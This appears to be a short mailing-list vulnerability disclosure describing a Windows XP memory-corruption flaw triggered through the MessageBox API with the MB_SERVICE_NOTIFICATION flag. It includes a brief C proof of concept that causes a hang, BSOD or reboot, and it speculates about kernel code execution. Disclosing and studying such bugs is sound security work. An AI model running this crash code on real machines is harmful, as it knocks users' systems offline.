Dear [email protected],
On one of Russian forum security vulnerability is discussed in
Microsoft Windows (Windows XP is tested). A vulnerability is caused by
memory corruption is string beginning with "\?\" is send thorugh
MessageBox API with MB_SERVICE_NOTIFICATION flag. It looks like some
"debug" feature not cleaned out in final release and it seems to
exploitable to code execution at kernel level. Code example below:
#include <stdio.h>
#include <windows.h>
int main(void){
int i;
char bug1 [] ="\\??\\XXXX";
for(i = 0; i < 10; i ++)
{
MessageBox(0, bug1, bug1, MB_SERVICE_NOTIFICATION);
}
}
System hangs, crashes (BSOD) or reboots.
–
http://www.security.nnov.ru
/\_/\
{ , . } |\
±-oQQo->{ ^ }<-----+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
±------------o66o–+ /
|/